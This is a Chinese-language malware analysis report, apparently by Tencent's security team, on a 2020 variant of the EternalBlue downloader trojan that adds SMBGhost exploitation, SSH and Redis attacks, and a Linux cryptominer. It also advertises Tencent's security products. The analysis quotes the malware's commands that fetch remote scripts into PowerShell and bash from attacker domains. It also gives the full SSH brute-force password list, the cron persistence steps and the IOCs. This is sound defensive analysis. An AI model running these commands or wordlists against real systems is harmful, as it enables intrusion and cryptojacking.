“黑球”行动再升级,SMBGhost漏洞攻击进入实战 – 作者:腾讯电脑管家

一、背景

2020年6月10日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击,之前的若干种病毒只是利用SMBGhost漏洞做扫描检测,并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。 

由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限,可直接攻击SMB服务造成RCE(远程代码执行),存在漏洞的计算机只要联网就可能被黑客探测攻击,并获得系统最高权限。使得木马针对Windows系统的攻击威力再次增强。 

腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示,至今仍有近三分之一的系统未修补该漏洞,我们再次强烈建议所有用户尽快修补SMBGhost漏洞(CVE-2020-0796)。 

此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,在失陷系统创建定时任务并植入挖矿木马功能,使得其攻击的范围继续扩大,包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马,并会按照惯例在开始挖矿前,清除其他挖矿木马,以便独占系统资源。​挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。 

腾讯安全系列产品应对永恒之蓝下载器木马的响应清单:

应用场景 安全产品 解决方案
腾讯T-Sec 威胁情报云查服务 (SaaS) 1)永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。 可参考:https://cloud.tencent.com/product/tics
腾讯T-Sec 高级威胁追溯系统 1)永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts
云原生安全 防护 腾讯T-Sec 安全运营中心 (云SOC) 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。   关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html
腾讯T-Sec 网络资产风险监测系统 (腾讯御知) 1)腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2)已集成无损检测POC,企业可以对自身资产进行远程检测。   关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html
云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。   有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw
腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测; 2)已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授权访问漏洞入侵的挖矿木马、后门程序。   腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp
非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta
腾讯T-Sec终端安全管理系统(御点) 1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3)企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html

更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 

二、样本分析

攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击,攻击成功后远程执行以下shellcode:

powershell IEx(New-ObjectNet.WebClient).DownLoadString(”http[:]///t.amynx.com/smgho.jsp?0.8*%computername%”)

1.png

发起针对Linux服务器的攻击: 

1、 利用SSH爆破

扫描22端口进行探测,针对Linux系统root用户,尝试利用弱密码进行爆破连接,爆破使用密码字典:

“saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dubsmash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,”fuckyou”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,””,”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta”

 

爆破登陆成功后执行远程命令:

Src=ssho;(curl -fsSLhttp[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O-http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash

2.png

2、 利用Redis未授权访问漏洞

扫描6379端口进行探测,在函数redisexec中尝试连接未设置密码的redis服务器,访问成功后执行远程命令:export src=rdso;curl-fsSL t.amynx.com/ln/core.png?rdso|bash

3.png

SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png,该脚本主要有以下功能:

1、 创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp

2、 创建crontab定时启动Linux平台挖矿木马/.Xll/xr

4.png

通过定时任务执行的a.asp首先会清除竞品挖矿木马:

5.png

然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP,重新与该机器建立连接进行内网扩散攻击:

6.png

创建目录/.Xll并下载挖矿木马(d[.]ackng.com/ln/xr.zip)到该目录下,解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。

7.png

永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态,目前该木马会通过以下方法进行扩散传播:

漏洞利用 弱口令爆破 感染可移动设备 鱼叉攻击
“永恒之蓝”漏洞利用MS17-010 $IPC爆破 通过U盘、网络共享盘 以新冠肺炎等多种主题
Lnk漏洞利用CVE-2017-8464 SMB爆破 创建带漏洞lnk文件、js文件 DOC漏洞文档、js文件诱饵
Office漏洞利用CVE-2017-8570 MS SQL爆破    
SMBGhost漏洞利用CVE-2020-0796 RDP爆破    
Redis未授权访问漏洞(针对Linux) SSH爆破(针对Linux)    

  

截止2020年6月12日,永恒之蓝木马下载器家族主要版本更新功能列表如下:

2018年12月14日 利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。
2018年12月19日 下载之后的木马新增Powershell后门安装。
2019年1月9日 检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。
2019年1月24日 木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。
2019年1月25日 木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。
2019年2月10日 将攻击模块打包方式改为Pyinstaller。
2019年2月20日 更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。
2019年2月23日 攻击方法再次更新,新增MsSQL爆破攻击。
2019年2月25日 在2月23日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。
2019年3月6日 通过已感染机器后门更新Powershell脚本横向传播模块ipc。
2019年3月8日 通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。
2019年3月14日 通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。
2019年3月28日 更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。
2019年4月3日 开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。
2019年7月19日 无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击,感染启动盘和网络共享盘,新增MsSQL爆破攻击。
2019年10月9日 新增Bluekeep漏洞CVE-2019-0708检测上报功能。
2020年2月12日 使用DGA域名,篡改hosts文件。
2020年4月3日 新增钓鱼邮件传播,邮件附件urgent.doc包含Office漏洞CVE-2017-8570。
2020年4月17日 钓鱼邮件新增附件readme.zip、readme.doc,新增Bypass UAC模块7p.php,创建readme.js文件感染可移动盘、网络共享盘
2020年5月21日 新增SMBGhost漏洞CVE-2020-0796检测上报功能,新增SSH爆破代码(未调用)。
2020年6月10日 新增SMBGhost漏洞CVE-2020-0796利用攻击,新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。


IOCs

Domain

t.amynx.com

t.zer9g.com

t.zz3r0.com

d.ackng.com

 

URL

http[:]//t.amynx.com/smgh.jsp

http[:]//t.amynx.com/a.jsp

http[:]//t.amynx.com/ln/a.asp

http[:]//t.amynx.com/ln/core.png

http[:]//d.ackng.com/if.bin

http[:]//d.ackng.com/smgh.bin

http[:]//d.ackng.com/ln/xr.zip

 

Md5

if.bin 99ecca08236f6cf766d7d8e2cc34eff6
xr.zip 2977084f9ce3e9e2d356adaf2b5bdcfd
core.png 17703523f5137bc0755a7e4f133fc9d3
a.asp 8b0cb7a0760e022564465e50ce3271bb
smgh.bin 5b3c44***3c7e592e416f68d3924620f

 

参考链接:

永恒之蓝木马下载器发起“黑球”行动,新增SMBGhost漏洞检测能力

https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ

来源:freebuf.com 2020-06-12 17:53:55 by: 腾讯电脑管家

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论